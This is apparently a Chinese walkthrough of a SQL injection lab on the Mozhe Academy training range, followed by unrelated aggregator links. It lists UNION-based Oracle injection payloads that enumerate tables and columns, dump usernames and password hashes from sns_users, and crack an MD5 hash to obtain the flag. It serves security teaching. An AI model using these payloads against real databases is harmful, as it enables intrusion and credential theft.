当前位置: 首页 > news >正文

oracle注入

使用的是墨者学院的靶场
使用?id=2-1可以看到是数字型图片
使用order by来测试字段数
可以看到order by 2正常显示
图片
order by 3不显示
图片
可以确定一共使用的是两列,这时测试回显点
payload:?id=-1 union select 'null','null' from dual
图片
两个都显示,那就先模糊查询user表
payload:?id=-1 union select (select table_name from user_tables where table_name like '%user%' ),'null' from dual
图片
查询第一个列名
payload:-1 union select (select column_name from user_tab_columns where table_name='sns_users' and rownum=1),'null' from dual
图片
查询第二个列名
payload:-1 union select (select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name not in 'USER_NAME'),'null' from dual
图片
查询数据
payload:-1 union select USER_PWD,USER_NAME from "sns_users" where rownum=1
图片
得到用户名zhong,密码1c63129ae9asc60asdua94d3e00495看着像MD5加密,但是只有30位肯定不对,继续找
payload:-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME not in 'zhong'
图片
账号:hu,密码1c63129ae9db9g20asdua94d3e00495也不对,继续
payload:-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME not in ('zhong','hu')
图片
这就对了!账号mozhe,密码d2bcc7dc1defad59e8212a7f394717e7,拿去MD5解密904775
图片
登录拿到KEYmozhed1c1fa77f3467a4443c90902b59图片

http://www.sczhlp.com/news/68786/

相关文章:

  • 网站首页排名突然没了wordpress 自带模板下载
  • 深圳有没有维护公司网站成都网站制作公司科蓝
  • 济南网络优化中心照片网站怎么关键字优化
  • dw建网站怎么做wordpress 首页模版
  • 视频在线网站免费观看优秀品牌vi设计公司
  • 怎样修改公司网站内容义乌缔造网络科技有限公司
  • 手机端的网页外贸网站seo招聘
  • 哪里有网站建设服务杭州网站关键词排名优化
  • 沧浪seo网站优化软件做网站建设要什么证
  • 信息系统的网站开发答辩问题网站建设的未来
  • [笔记]数位 DP
  • 如何做网站导航wordpress部署到tomcat
  • 校园旅游网站建设方案策划书上海外贸seo推广
  • 域名抢住网站icp备案域名网站备案信息
  • 广西南宁官方网站企业沈阳市住房和城乡建设厅网站首页
  • 深圳网站开发建设服务公司网站管理页面
  • 工信部网站备案登录wordpress 双语插件
  • 有人说用 claude code cli 和 glm4.5搭配,如果提示词写的足够好,可以跟 claude code sonne4,或者opus4.1相媲美。那么这个提示词应该怎么写呢?
  • 现在收废品做哪个网站好产品宣传片
  • 访问国外网站加速手工制作大全女生的最爱
  • 做外贸是用什么网站做汕头网页设计
  • 域名大全免费网站余杭区住房与建设局网站
  • 描述建设网站的步骤网站移动端推广
  • 投票网站开发上海做宴会的网站
  • 网站的页面凡科 wordpress
  • 心馨人生网站建设设计皮皮果网站建设
  • 成都电商网站开发公司哪个网站做体检预约的
  • 做宾馆网站在做网站的公司做网站运营犯法吗
  • Windows 10/11 快速更改IP地址的批处理脚本
  • vue表单是数值类型,请求接口时却变成了字符串